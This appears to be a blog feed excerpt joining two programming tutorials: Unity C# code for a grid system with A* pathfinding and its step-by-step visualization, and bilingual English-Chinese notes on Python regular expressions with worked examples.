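    for (int y = 0; y < grid.GetHeight(); y++)
    {
    float t = grid.GetGridObject(x, y).GetValueNormalized();
    cellRenderers[x, y].color = Color.Lerp(Color.black, Color.red, t);
    }
    }
    }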

    Designing and Using a StringGridObject Class

    The complete Testing.cs code for designing and using the StringGridObject class:

    using UnityEngine;
    using CodeMonkey.Utils;

    public class Testing : MonoBehaviour
    {
    private Grid<StringGridObject> stringGrid;
    // Start is called before the first frame update
    void Start()
    {
    stringGrid = new Grid<StringGridObject>(4, 2, 10f, new Vector3(20, 0), (Grid<StringGridObject> g, int x, int y) => new StringGridObject(g, x, y));
    }

    private void Update()
    {
    Vector3 position = UtilsClass.GetMouseWorldPosition();
    // GetGridObject returns null for positions outside the grid, so guard with ?. before mutating.
    if (Input.GetKeyDown(KeyCode.A)) { stringGrid.GetGridObject(position)?.AddLetter("A"); }
    if (Input.GetKeyDown(KeyCode.B)) { stringGrid.GetGridObject(position)?.AddLetter("B"); }
    if (Input.GetKeyDown(KeyCode.C)) { stringGrid.GetGridObject(position)?.AddLetter("C"); }

    if (Input.GetKeyDown(KeyCode.Alpha1)) { stringGrid.GetGridObject(position)?.AddNumber("1"); }
    if (Input.GetKeyDown(KeyCode.Alpha2)) { stringGrid.GetGridObject(position)?.AddNumber("2"); }
    if (Input.GetKeyDown(KeyCode.Alpha3)) { stringGrid.GetGridObject(position)?.AddNumber("3"); }
    }

    public class StringGridObject
    {
    private Grid<StringGridObject> grid;
    private int x;
    private int y;

    public string letters;
    public string numbers;

    public StringGridObject(Grid<StringGridObject> grid, int x, int y)
    {
    this.grid = grid;
    this.x = x;
    this.y = y;
    letters = "";
    numbers = "";
    }

    public void AddLetter(string letter)
    {
    letters += letter;
    grid.TriggerGridObjectChanged(x, y);
    }

    public void AddNumber(string number)
    {
    numbers += number;
    grid.TriggerGridObjectChanged(x, y);
    }

    public override string ToString()
    {
    return letters + "\n" + numbers;
    }
    }
    }

    Result:

    (screenshot)

    The A* Algorithm

    A* Pathfinding in Unity

    This part really involves a lot of code… I'll just copy it over directly.

    Scene object layout:

    (screenshot)

    CharacterPathfindingMovementHandler: controls character movement

    using System.Collections.Generic;
    using UnityEngine;
    using V_AnimationSystem;
    using CodeMonkey.Utils;

    public class CharacterPathfindingMovementHandler : MonoBehaviour {

    private const float speed = 40f;

    private V_UnitSkeleton unitSkeleton;
    private V_UnitAnimation unitAnimation;
    private AnimatedWalker animatedWalker;
    private int currentPathIndex;
    private List<Vector3> pathVectorList;


    private void Start() {
    Transform bodyTransform = transform.Find("Body");
    unitSkeleton = new V_UnitSkeleton(1f, bodyTransform.TransformPoint, (Mesh mesh) => bodyTransform.GetComponent<MeshFilter>().mesh = mesh);
    unitAnimation = new V_UnitAnimation(unitSkeleton);
    animatedWalker = new AnimatedWalker(unitAnimation, UnitAnimType.GetUnitAnimType("dMarine_Idle"), UnitAnimType.GetUnitAnimType("dMarine_Walk"), 1f, 1f);
    }

    private void Update() {
    HandleMovement();
    unitSkeleton.Update(Time.deltaTime);

    if (Input.GetMouseButtonDown(0)) {
    SetTargetPosition(UtilsClass.GetMouseWorldPosition());
    }
    }

    private void HandleMovement() {
    if (pathVectorList != null) {
    Vector3 targetPosition = pathVectorList[currentPathIndex];
    if (Vector3.Distance(transform.position, targetPosition) > 1f) {
    Vector3 moveDir = (targetPosition - transform.position).normalized;

    float distanceBefore = Vector3.Distance(transform.position, targetPosition); // computed but unused in this version
    animatedWalker.SetMoveVector(moveDir);
    transform.position = transform.position + moveDir * speed * Time.deltaTime;
    } else {
    currentPathIndex++;
    if (currentPathIndex >= pathVectorList.Count) {
    StopMoving();
    animatedWalker.SetMoveVector(Vector3.zero);
    }
    }
    } else {
    animatedWalker.SetMoveVector(Vector3.zero);
    }
    }

    private void StopMoving() {
    pathVectorList = null;
    }

    public Vector3 GetPosition() {
    return transform.position;
    }

    public void SetTargetPosition(Vector3 targetPosition) {
    currentPathIndex = 0;
    pathVectorList = Pathfinding.Instance.FindPath(GetPosition(), targetPosition);

    if (pathVectorList != null && pathVectorList.Count > 1) {
    pathVectorList.RemoveAt(0);
    }
    }
    }
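    As the comment above notes, distanceBefore is computed each frame but never used. One plausible refinement (my own sketch, not from the video) is an overshoot guard inside HandleMovement(): if this frame's step would carry the character past the current waypoint, snap to the waypoint instead of stepping over it.

    // Hypothetical overshoot guard; would replace the transform.position line above.
    float step = speed * Time.deltaTime;
    if (step >= distanceBefore) {
    transform.position = targetPosition; // the step would overshoot, so land exactly on the waypoint
    } else {
    transform.position = transform.position + moveDir * step;
    }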

    PathfindingDebugStepVisual: interface visualization

    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using TMPro;
    using CodeMonkey.Utils;

    public class PathfindingDebugStepVisual : MonoBehaviour {
    public static PathfindingDebugStepVisual Instance { get; private set; }
    [SerializeField] private Transform pfPathfindingDebugStepVisualNode;
    private List<Transform> visualNodeList;
    private List<GridSnapshotAction> gridSnapshotActionList;
    private bool autoShowSnapshots;
    private float autoShowSnapshotsTimer;
    private Transform[,] visualNodeArray;
    private void Awake() {
    Instance = this;
    visualNodeList = new List<Transform>();
    gridSnapshotActionList = new List<GridSnapshotAction>();
    }
    public void Setup(Grid<PathNode> grid) {
    visualNodeArray = new Transform[grid.GetWidth(), grid.GetHeight()];

    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    Vector3 gridPosition = new Vector3(x, y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    Transform visualNode = CreateVisualNode(gridPosition);
    visualNodeArray[x, y] = visualNode;
    visualNodeList.Add(visualNode);
    }
    }
    HideNodeVisuals();
    }
    private void Update() {
    if (Input.GetKeyDown(KeyCode.Space)) {
    ShowNextSnapshot();
    }

    if (Input.GetKeyDown(KeyCode.Return)) {
    autoShowSnapshots = true;
    }
    if (autoShowSnapshots) {
    float autoShowSnapshotsTimerMax = .05f;
    autoShowSnapshotsTimer -= Time.deltaTime;
    if (autoShowSnapshotsTimer <= 0f) {
    autoShowSnapshotsTimer += autoShowSnapshotsTimerMax;
    ShowNextSnapshot();
    if (gridSnapshotActionList.Count == 0) {
    autoShowSnapshots = false;
    }
    }
    }
    }
    private void ShowNextSnapshot() {
    if (gridSnapshotActionList.Count > 0) {
    GridSnapshotAction gridSnapshotAction = gridSnapshotActionList[0];
    gridSnapshotActionList.RemoveAt(0);
    gridSnapshotAction.TriggerAction();
    }
    }
    public void ClearSnapshots() {
    gridSnapshotActionList.Clear();
    }
    public void TakeSnapshot(Grid<PathNode> grid, PathNode current, List<PathNode> openList, List<PathNode> closedList) {
    GridSnapshotAction gridSnapshotAction = new GridSnapshotAction();
    gridSnapshotAction.AddAction(HideNodeVisuals);
    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    PathNode pathNode = grid.GetGridObject(x, y);
    int gCost = pathNode.gCost;
    int hCost = pathNode.hCost;
    int fCost = pathNode.fCost;
    Vector3 gridPosition = new Vector3(pathNode.x, pathNode.y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    bool isCurrent = pathNode == current;
    bool isInOpenList = openList.Contains(pathNode);
    bool isInClosedList = closedList.Contains(pathNode);
    int tmpX = x;
    int tmpY = y;
    gridSnapshotAction.AddAction(() => {
    Transform visualNode = visualNodeArray[tmpX, tmpY];
    SetupVisualNode(visualNode, gCost, hCost, fCost);
    Color backgroundColor = UtilsClass.GetColorFromString("636363");
    if (isInClosedList) {
    backgroundColor = new Color(1, 0, 0);
    }
    if (isInOpenList) {
    backgroundColor = UtilsClass.GetColorFromString("009AFF");
    }
    if (isCurrent) {
    backgroundColor = new Color(0, 1, 0);
    }
    visualNode.Find("sprite").GetComponent<SpriteRenderer>().color = backgroundColor;
    });
    }
    }
    gridSnapshotActionList.Add(gridSnapshotAction);
    }
    public void TakeSnapshotFinalPath(Grid<PathNode> grid, List<PathNode> path) {
    GridSnapshotAction gridSnapshotAction = new GridSnapshotAction();
    gridSnapshotAction.AddAction(HideNodeVisuals);
    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    PathNode pathNode = grid.GetGridObject(x, y);
    int gCost = pathNode.gCost;
    int hCost = pathNode.hCost;
    int fCost = pathNode.fCost;
    Vector3 gridPosition = new Vector3(pathNode.x, pathNode.y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    bool isInPath = path.Contains(pathNode);
    int tmpX = x;
    int tmpY = y;
    gridSnapshotAction.AddAction(() => {
    Transform visualNode = visualNodeArray[tmpX, tmpY];
    SetupVisualNode(visualNode, gCost, hCost, fCost);
    Color backgroundColor;
    if (isInPath) {
    backgroundColor = new Color(0, 1, 0);
    } else {
    backgroundColor = UtilsClass.GetColorFromString("636363");
    }
    visualNode.Find("sprite").GetComponent<SpriteRenderer>().color = backgroundColor;
    });
    }
    }
    gridSnapshotActionList.Add(gridSnapshotAction);
    }
    private void HideNodeVisuals() {
    foreach (Transform visualNodeTransform in visualNodeList) {
    SetupVisualNode(visualNodeTransform, 9999, 9999, 9999);
    }
    }
    private Transform CreateVisualNode(Vector3 position) {
    Transform visualNodeTransform = Instantiate(pfPathfindingDebugStepVisualNode, position, Quaternion.identity);
    return visualNodeTransform;
    }
    private void SetupVisualNode(Transform visualNodeTransform, int gCost, int hCost, int fCost) {
    if (fCost < 1000) {
    visualNodeTransform.Find("gCostText").GetComponent<TextMeshPro>().SetText(gCost.ToString());
    visualNodeTransform.Find("hCostText").GetComponent<TextMeshPro>().SetText(hCost.ToString());
    visualNodeTransform.Find("fCostText").GetComponent<TextMeshPro>().SetText(fCost.ToString());
    } else {
    visualNodeTransform.Find("gCostText").GetComponent<TextMeshPro>().SetText("");
    visualNodeTransform.Find("hCostText").GetComponent<TextMeshPro>().SetText("");
    visualNodeTransform.Find("fCostText").GetComponent<TextMeshPro>().SetText("");
    }
    }
    private class GridSnapshotAction {
    private Action action;
    public GridSnapshotAction() {
    action = () => { };
    }
    public void AddAction(Action action) {
    this.action += action;
    }
    public void TriggerAction() {
    action();
    }
    }
    }
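    One C# detail worth flagging in the two snapshot methods: x and y are copied into tmpX/tmpY before the lambda captures them. Lambdas capture variables, not values, and a for-loop variable is shared across iterations, so without the per-iteration copy every queued action would read the loop's final value. A minimal standalone illustration (my own example, not tutorial code):

    using System;
    using System.Collections.Generic;

    List<Action> actions = new List<Action>();
    for (int i = 0; i < 3; i++) {
    int tmp = i;                                 // fresh variable per iteration
    actions.Add(() => Console.WriteLine(tmp));   // prints 0, 1, 2
    // actions.Add(() => Console.WriteLine(i));  // would print 3, 3, 3
    }
    foreach (Action a in actions) a();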

    PathfindingDebugStepVisual: algorithm step visualization

    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using TMPro;
    using CodeMonkey.Utils;

    public class PathfindingDebugStepVisual : MonoBehaviour {
    public static PathfindingDebugStepVisual Instance { get; private set; }
    [SerializeField] private Transform pfPathfindingDebugStepVisualNode;
    private List<Transform> visualNodeList;
    private List<GridSnapshotAction> gridSnapshotActionList;
    private bool autoShowSnapshots;
    private float autoShowSnapshotsTimer;
    private Transform[,] visualNodeArray;
    private void Awake() {
    Instance = this;
    visualNodeList = new List<Transform>();
    gridSnapshotActionList = new List<GridSnapshotAction>();
    }
    public void Setup(Grid<PathNode> grid) {
    visualNodeArray = new Transform[grid.GetWidth(), grid.GetHeight()];
    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    Vector3 gridPosition = new Vector3(x, y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    Transform visualNode = CreateVisualNode(gridPosition);
    visualNodeArray[x, y] = visualNode;
    visualNodeList.Add(visualNode);
    }
    }
    HideNodeVisuals();
    }
    private void Update() {
    if (Input.GetKeyDown(KeyCode.Space)) {
    ShowNextSnapshot();
    }
    if (Input.GetKeyDown(KeyCode.Return)) {
    autoShowSnapshots = true;
    }
    if (autoShowSnapshots) {
    float autoShowSnapshotsTimerMax = .05f;
    autoShowSnapshotsTimer -= Time.deltaTime;
    if (autoShowSnapshotsTimer <= 0f) {
    autoShowSnapshotsTimer += autoShowSnapshotsTimerMax;
    ShowNextSnapshot();
    if (gridSnapshotActionList.Count == 0) {
    autoShowSnapshots = false;
    }
    }
    }
    }
    private void ShowNextSnapshot() {
    if (gridSnapshotActionList.Count > 0) {
    GridSnapshotAction gridSnapshotAction = gridSnapshotActionList[0];
    gridSnapshotActionList.RemoveAt(0);
    gridSnapshotAction.TriggerAction();
    }
    }
    public void ClearSnapshots() {
    gridSnapshotActionList.Clear();
    }
    public void TakeSnapshot(Grid<PathNode> grid, PathNode current, List<PathNode> openList, List<PathNode> closedList) {
    GridSnapshotAction gridSnapshotAction = new GridSnapshotAction();
    gridSnapshotAction.AddAction(HideNodeVisuals);
    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    PathNode pathNode = grid.GetGridObject(x, y);
    int gCost = pathNode.gCost;
    int hCost = pathNode.hCost;
    int fCost = pathNode.fCost;
    Vector3 gridPosition = new Vector3(pathNode.x, pathNode.y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    bool isCurrent = pathNode == current;
    bool isInOpenList = openList.Contains(pathNode);
    bool isInClosedList = closedList.Contains(pathNode);
    int tmpX = x;
    int tmpY = y;
    gridSnapshotAction.AddAction(() => {
    Transform visualNode = visualNodeArray[tmpX, tmpY];
    SetupVisualNode(visualNode, gCost, hCost, fCost);
    Color backgroundColor = UtilsClass.GetColorFromString("636363");

    if (isInClosedList) {
    backgroundColor = new Color(1, 0, 0);
    }
    if (isInOpenList) {
    backgroundColor = UtilsClass.GetColorFromString("009AFF");
    }
    if (isCurrent) {
    backgroundColor = new Color(0, 1, 0);
    }
    visualNode.Find("sprite").GetComponent<SpriteRenderer>().color = backgroundColor;
    });
    }
    }
    gridSnapshotActionList.Add(gridSnapshotAction);
    }
    public void TakeSnapshotFinalPath(Grid<PathNode> grid, List<PathNode> path) {
    GridSnapshotAction gridSnapshotAction = new GridSnapshotAction();
    gridSnapshotAction.AddAction(HideNodeVisuals);
    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    PathNode pathNode = grid.GetGridObject(x, y);
    int gCost = pathNode.gCost;
    int hCost = pathNode.hCost;
    int fCost = pathNode.fCost;
    Vector3 gridPosition = new Vector3(pathNode.x, pathNode.y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    bool isInPath = path.Contains(pathNode);
    int tmpX = x;
    int tmpY = y;
    gridSnapshotAction.AddAction(() => {
    Transform visualNode = visualNodeArray[tmpX, tmpY];
    SetupVisualNode(visualNode, gCost, hCost, fCost);
    Color backgroundColor;
    if (isInPath) {
    backgroundColor = new Color(0, 1, 0);
    } else {
    backgroundColor = UtilsClass.GetColorFromString("636363");
    }
    visualNode.Find("sprite").GetComponent<SpriteRenderer>().color = backgroundColor;
    });
    }
    }
    gridSnapshotActionList.Add(gridSnapshotAction);
    }
    private void HideNodeVisuals() {
    foreach (Transform visualNodeTransform in visualNodeList) {
    SetupVisualNode(visualNodeTransform, 9999, 9999, 9999);
    }
    }
    private Transform CreateVisualNode(Vector3 position) {
    Transform visualNodeTransform = Instantiate(pfPathfindingDebugStepVisualNode, position, Quaternion.identity);
    return visualNodeTransform;
    }
    private void SetupVisualNode(Transform visualNodeTransform, int gCost, int hCost, int fCost) {
    if (fCost < 1000) {
    visualNodeTransform.Find("gCostText").GetComponent<TextMeshPro>().SetText(gCost.ToString());
    visualNodeTransform.Find("hCostText").GetComponent<TextMeshPro>().SetText(hCost.ToString());
    visualNodeTransform.Find("fCostText").GetComponent<TextMeshPro>().SetText(fCost.ToString());
    } else {
    visualNodeTransform.Find("gCostText").GetComponent<TextMeshPro>().SetText("");
    visualNodeTransform.Find("hCostText").GetComponent<TextMeshPro>().SetText("");
    visualNodeTransform.Find("fCostText").GetComponent<TextMeshPro>().SetText("");
    }
    }
    private class GridSnapshotAction {
    private Action action;
    public GridSnapshotAction() {
    action = () => { };
    }
    public void AddAction(Action action) {
    this.action += action;
    }
    public void TriggerAction() {
    action();
    }
    }
    }

    Testing.cs

    Testing.cs source code:

    using System.Collections.Generic;
    using UnityEngine;
    using CodeMonkey.Utils;
    using CodeMonkey;

    public class Testing : MonoBehaviour {

    [SerializeField] private PathfindingDebugStepVisual pathfindingDebugStepVisual;
    [SerializeField] private PathfindingVisual pathfindingVisual;
    [SerializeField] private CharacterPathfindingMovementHandler characterPathfinding;
    private Pathfinding pathfinding;

    private void Start() {
    pathfinding = new Pathfinding(20, 10);
    pathfindingDebugStepVisual.Setup(pathfinding.GetGrid());
    pathfindingVisual.SetGrid(pathfinding.GetGrid());
    }

    private void Update() {
    if (Input.GetMouseButtonDown(0)) {
    Vector3 mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
    pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
    List<PathNode> path = pathfinding.FindPath(0, 0, x, y);
    if (path != null) {
    for (int i=0; i<path.Count - 1; i++) {
    Debug.DrawLine(new Vector3(path[i].x, path[i].y) * 10f + Vector3.one * 5f, new Vector3(path[i+1].x, path[i+1].y) * 10f + Vector3.one * 5f, Color.green, 5f);
    }
    }
    characterPathfinding.SetTargetPosition(mouseWorldPosition);
    }

    if (Input.GetMouseButtonDown(1)) {
    Vector3 mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
    pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
    pathfinding.GetNode(x, y).SetIsWalkable(!pathfinding.GetNode(x, y).isWalkable);
    }
    }

    }
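    The magic numbers in the Debug.DrawLine call mirror the grid settings used in this scene: multiplying grid coordinates by 10f (the cell size) and adding Vector3.one * 5f (half a cell) lands on the center of each cell, assuming the grid origin sits at the world origin. The same arithmetic as a named helper (my restatement, not code from the video):

    // Center of grid cell (x, y) in world space, assuming cellSize = 10 and origin (0, 0).
    private Vector3 GetCellCenter(int x, int y) {
    return new Vector3(x, y) * 10f + Vector3.one * 5f;
    }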
    ]]>
    @@ -9300,7 +9300,7 @@ /posts/Python-Regular%20Expressions%20made%20Easy/ - Resources
    • Python Regular Expressions - part #1 - YouTube

    • Regular Expressions are used to match string patterns. 正则表达式用于匹配字符串模式。

      • They are very powerful 它们非常强大

      • If you want to pull out a string pattern RE can do it 如果你想拉出一个字符串模式正则可以做到

      • They may seem intimidating 他们可能看起来很吓人

    Course notes

    Things to note

    • The first thing I want to start off with is the backslash character

      • 我想要开始的第一件事是反斜杠字符
    • Very confusing to people

      • 很让人困惑
    • Python uses back slash to indicate special characters

      • Python 使用反斜杠表示特殊字符
    • '\n' Backslash followed by n denotes a newline

      • 反斜杠后面加 n 表示换行符
    • '\t' denotes a tab

      • ‘\t’ 表示制表符
    • The 'r' prefix, which disables Python's special-character escapes

      • 'r’表达式,将使 Python 的特殊字符无效
    • r'\n' means it's a raw string with two characters, '\' and 'n', as opposed to just one special character

      • r'\n' 表示它是一个有两个字符 '\' 和 'n' 的原始字符串,而不是只有一个特殊字符
    • Let's see some examples of this; don't mind the Python syntax

      • 让我们看一些这样的例子,不要介意 python 语法

    How do you use re.search() in Python regular expressions?

    re.search(pattern, string, flags =0)

    import re
    re.search('n', '\n') # first item is pattern, second item is string
    # two ways to handle this one way is to use \ for every backslash
    # 有两种处理方法,一种方法是对每个反斜杠使用\ (另一种是在前面加 r)
    re.search('n', '\\n')
    <re.Match object; span=(1, 2), match='n'>
    # not the best way if we have too many \s
    # 如果我们有太多的\,这不是最好的方法
    re.search('n', '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    # r converts to raw string
    # r 转换为原始字符串
    re.search('n', r'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    <re.Match object; span=(1, 2), match='n'>
    """
    there are some nuances that you should be aware of: regular expressions
    have their own special characters as well; regex with '\n' and r'\n' both
    look for newline.
    你应该注意到一些细微的差别,正则表达式也有自己的特殊字符,
    带有'\n'和 r'\n'的正则表达式都查找换行符
    """
    re.search('\n', '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    <re.Match object; span=(0, 1), match='\n'>
    # this works as well because r'\n' also looks for new line
    # 同样有效,因为 pattern 中 r'\n' 也会查找新行
    re.search(r'\n', '\n\n')
    <re.Match object; span=(0, 1), match='\n'>
    # doesn't work because string doesn't use newline and r'\n' looks for newline
    # 不能工作,因为 string 不使用换行符,而 pattern 中 r'\n'查找换行符
    re.search(r'\n', r'\n\n')

    MATCH and SEARCH EXAMPLES

    Common RE methods - Match and Search

    • searches anywhere in the sentence 搜索句子中的任何位置
    • flags: special options 标志:特殊选项

    re.search(pattern, string, flags)

    • only beginning of the string 只搜索字符串的开始

    re.match(pattern, string, flags)

    # returns none because only looks at the start of string
    # 返回 none,因为只查看字符串的开头
    re.match("c", "abcdef")
    re.search("c", "abcdef")  # searches anywhere
    <re.Match object; span=(2, 3), match='c'>
    bool(re.match("c", "abcdef"))  # no match returns boolean false
    False
    bool(re.match("a", "abcdef"))  # match returns true
    True
    # tells you where it matched first and only first
    # 告诉你它首先匹配的位置
    re.search("c", "abcdef")
    <re.Match object; span=(2, 3), match='c'>
    re.search("c", "abcdefc")  # multiple 'c's first instance only 返回多个 c 的第一个实例
    <re.Match object; span=(2, 3), match='c'>
    re.search("c", "abdef\nc")  # multiline works with search 多行与搜索一起工作
    <re.Match object; span=(6, 7), match='c'>
    re.match("c", "\nc")  # match doesn't work with newline 匹配对换行符无效
    (re.match("a", "abcdef"))  # match objects
    <re.Match object; span=(0, 1), match='a'>

    re.match().group(num=0) in Python regex matching

    re.match("a", "abcdef").group()  # string output # default value is 0 默认值为 0
    'a'
    re.match("a", "abcdef").group(0)  
    'a'
    re.search("n", "abcdefnc abcd").group()
    'n'
    re.search('n.+', "abcdefnc abcd").group()  # pull out different types of strings 拿出不同类型的字符串
    # depending on the wildcards you use 这取决于您使用的通配符
    'nc abcd'

    Python regex (2): the group/start/end/span methods

    re.search("c", "abdef\nc").start()
    6
    re.search("c", "abdef\nc").end()
    7

    Literal matching

    re.search('na',"abcdefnc abcd" )  # returns None: the characters must appear in order, and 'na' never occurs 无效,因为它们是有序的
    re.search('n|a',"abcdefnc abcda" )  # n or a
    <re.Match object; span=(0, 1), match='a'>
    re.search('n|a',"bcdefnc abcda" )  # replaced the a with b, first match is an n
    <re.Match object; span=(5, 6), match='n'>
    re.search('n|a|b',"bcdefnc abcda" ) # as many OR expressions
    <re.Match object; span=(0, 1), match='b'>

    re.findall

    re.findall('n|a',"bcdefnc abcda" ) # find all pulls out all instances 取出所有实例
    ['n', 'a', 'a']
    re.search('abcd',"abcdefnc abcd" ) # multiple characters - literal search 多字符-文字搜索
    <re.Match object; span=(0, 4), match='abcd'>
    re.findall('abcd',"abcdefnc abcd" ) 
    ['abcd', 'abcd']

    CHARACTER SETS

    • Character sets can match a set of characters
      • They simplify regular expressions
    import re
    re.search('abcd',"abcdefnc abcd" ) # earlier code 之前的代码
    <re.Match object; span=(0, 4), match='abcd'>
    re.search(r'\w\w\w\w',"abcdefnc abcd" )  # matches characters and numbers 匹配字符和数字
    # alpha numeric characters
    <re.Match object; span=(0, 4), match='abcd'>

    \w matches alpha numeric characters [a-zA-Z0-9_]

    re.search(r'\w\w\w\w',"ab_cdefnc abcd" )  # matches _ character 匹配_字符
    <re.Match object; span=(0, 4), match='ab_c'>
    re.search(r'\w\w\w', "a3.!-!")  # returns None: \w doesn't match symbols, only letters, digits, and underscore 不匹配符号,只匹配数字和字符
    re.search(r'\w\w\w', "a33-_!") .group()
    'a33'

    \W is the opposite of \w;

    so it matches anything not included in [a-zA-Z0-9_]

    re.search(r'\w\w\W', "a3.-_!")  # \W matches non characters and numbers
    # \W 匹配非字符和数字
    <re.Match object; span=(0, 3), match='a3.'>
    re.search(r'\w\w\W', "a3 .-_!")  # matches empty space as well 
    # \W 也可以匹配空格
    <re.Match object; span=(0, 3), match='a3 '>

    We will go over other character sets later on

    Let's go over quantifiers

    • quantifiers
      • '+' = 1 or more
      • '?' = 0 or 1
      • '*' = 0 or more
      • '{n,m}' = n to m repetitions {,3}, {3,}
    re.search(r'\w\w',"abcdefnc abcd" )
    <re.Match object; span=(0, 2), match='ab'>
    re.search(r'\w+',"abcdefnc abcd" ).group()  # when we don't know the number of letters 不知道单词的字母个数
    'abcdefnc'
    re.search(r'\w+\W+\w+',"abcdefnc abcd").group()
    'abcdefnc abcd'
    re.search('\w+\W+\w+',"abcdefnc       abcd").group()  # added spaces
    'abcdefnc       abcd'
    re.search(r'\w+\W?\w+',"abcdefnabcd").group()  # ? = 0 or 1 instances
    'abcdefnabcd'
    re.search(r'\w+\W?\w+',"abcde fnabcd").group()
    'abcde fnabcd'
    re.search(r'\w+\W+\w+', "abcdefnabcd")
    • Pulling out specific amounts
      • 取出特定数量
    re.search(r'\w{3}', 'aaaaaaaaaaa')  # only 3 \w characters
    <re.Match object; span=(0, 3), match='aaa'>
    re.search(r'\w{1,4}', 'aaaaaaaaaaa').group()  #1 is min, 4 is max
    'aaaa'
    re.search(r'\w{1,10}\W{0,4}\w+',"abcdefnc abcd").group()
    # 1-10 \w characters,
    # 0-4 \W characters,
    # 1+ \w characters
    'abcdefnc abcd'
    re.search(r'\w{1,}\W{0,}\w+',"abcdefnc abcd").group() #at least 1, at least 0, 1+
    'abcdefnc abcd'

    Other types of character sets

    '\d' = matches digits [0-9]

    '\D' = matches any non-digit character; the opposite of \d

    import re
    string = '23abced++'
    re.search('\d+', string).group()
    '23'
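    For '\D', a quick check (my own example, mirroring the one above):

    re.search(r'\D+', string).group()  # grabs the first run of non-digits
    'abced++'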

    '\s' = matches any whitespace character, new lines, tabs, spaces etc 匹配任何空白字符,新行,制表符,空格等

    '\S' = matches any non-whitespace character : ~\s 匹配任何非空格字符:~\s

    string = '23abced++'
    re.search('\S+', string).group() # no spaces
    '23abced++'
    string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.

    Vines and some fungi extend from their tips to explore their surroundings.
    Elliot Hawkes of the University of California in Santa Barbara
    and his colleagues designed a bot that works
    on similar principles. Its mechanical body
    sits inside a plastic tube reel that extends
    through pressurized inflation, a method that some
    invertebrates like peanut worms (Sipunculus nudus)
    also use to extend their appendages. The plastic
    tubing has two compartments, and inflating one
    side or the other changes the extension direction.
    A camera sensor at the tip alerts the bot when it’s
    about to run into something.

    In the lab, Hawkes and his colleagues
    programmed the robot to form 3-D structures such
    as a radio antenna, turn off a valve, navigate a maze,
    swim through glue, act as a fire extinguisher, squeeze
    through tight gaps, shimmy through fly paper and slither
    across a bed of nails. The soft bot can extend up to
    72meters, and unlike plants, it can grow at a speed of
    10meters per second, the team reports July 19 in Science Robotics.
    The design could serve as a model for building robots
    that can traverse constrained environments

    This isn’t the first robot to take
    inspiration from plants. One plantlike
    predecessor was a robot modeled on roots.'''
    (re.findall('\S+', string))  # returns every whitespace-separated token in string 返回 string 中所有的单词
    ['Robots', 'are', 'branching', 'out.', 'A', 'new', 'prototype', 'soft', 'robot', 'takes', 'inspiration', 'from', 'plants', 'by', 'growing', 'to', 'explore', 'its', 'environment.', 'Vines', 'and', 'some', 'fungi', 'extend', 'from', 'their', 'tips', 'to', 'explore', 'their', 'surroundings.', 'Elliot', 'Hawkes', 'of', 'the', 'University', 'of', 'California', 'in', 'Santa', 'Barbara', 'and', 'his', 'colleagues', 'designed', 'a', 'bot', 'that', 'works', 'on', 'similar', 'principles.', 'Its', 'mechanical', 'body', 'sits', 'inside', 'a', 'plastic', 'tube', 'reel', 'that', 'extends', 'through', 'pressurized', 'inflation,', 'a', 'method', 'that', 'some', 'invertebrates', 'like', 'peanut', 'worms', '(Sipunculus', 'nudus)', 'also', 'use', 'to', 'extend', 'their', 'appendages.', 'The', 'plastic', 'tubing', 'has', 'two', 'compartments,', 'and', 'inflating', 'one', 'side', 'or', 'the', 'other', 'changes', 'the', 'extension', 'direction.', 'A', 'camera', 'sensor', 'at', 'the', 'tip', 'alerts', 'the', 'bot', 'when', 'it’s', 'about', 'to', 'run', 'into', 'something.', 'In', 'the', 'lab,', 'Hawkes', 'and', 'his', 'colleagues', 'programmed', 'the', 'robot', 'to', 'form', '3-D', 'structures', 'such', 'as', 'a', 'radio', 'antenna,', 'turn', 'off', 'a', 'valve,', 'navigate', 'a', 'maze,', 'swim', 'through', 'glue,', 'act', 'as', 'a', 'fire', 'extinguisher,', 'squeeze', 'through', 'tight', 'gaps,', 'shimmy', 'through', 'fly', 'paper', 'and', 'slither', 'across', 'a', 'bed', 'of', 'nails.', 'The', 'soft', 'bot', 'can', 'extend', 'up', 'to', '72', 'meters,', 'and', 'unlike', 'plants,', 'it', 'can', 'grow', 'at', 'a', 'speed', 'of', '10', 'meters', 'per', 'second,', 'the', 'team', 'reports', 'July', '19', 'in', 'Science', 'Robotics.', 'The', 'design', 'could', 'serve', 'as', 'a', 'model', 'for', 'building', 'robots', 'that', 'can', 'traverse', 'constrained', 'environments', 'This', 'isn’t', 'the', 'first', 'robot', 'to', 'take', 'inspiration', 'from', 'plants.', 'One', 'plantlike', 'predecessor', 'was', 'a', 'robot', 'modeled', 'on', 'roots.']
    ' '.join(re.findall('\S+', string))
